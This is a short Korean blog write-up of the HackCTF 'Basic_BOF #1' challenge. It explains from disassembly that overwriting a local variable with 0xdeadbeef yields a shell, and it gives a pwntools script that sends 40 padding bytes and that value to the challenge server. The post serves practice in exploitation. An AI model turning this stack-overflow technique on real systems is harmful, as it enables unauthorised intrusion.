ii4gsp

HackCTF - Basic_BOF #1 본문

시스템 해킹/HackCTF

HackCTF - Basic_BOF #1

ii4gsp 2020. 2. 8. 19:11

파일을 다운받아 주자.

 

 

 

 

파일을 IDA로 열어보면 v5가 0xdeadbeef면 쉘을 획득한다.

s와 v5의 거리는 40byte이다.

fgets()함수로 s에 45만큼 입력받으니 40byte를 채우고 0xdeadbeef를 입력해주면 된다.

 

 

 

 

from pwn import *

r = remote("ctf.j0n9hyun.xyz", 3000)

payload = ''
payload += '\x90' * (0x34 - 0xc)
payload += p32(0xdeadbeef)

r.sendline(payload)
r.interactive()

소스코드를 작성해주자.

 

 

 

 

'시스템 해킹 > HackCTF' 카테고리의 다른 글

HackCTF - x64 Simple_size_BOF  (0) 2020.02.09
HackCTF - x64 Buffer Overflow  (0) 2020.02.09
HackCTF - 내 버퍼가 흘러넘친다!!!  (0) 2020.02.09
HackCTF - Basic_FSB  (0) 2020.02.09
HackCTF - Basic_BOF #2  (0) 2020.02.08
'시스템 해킹/HackCTF' Related Articles more
Comments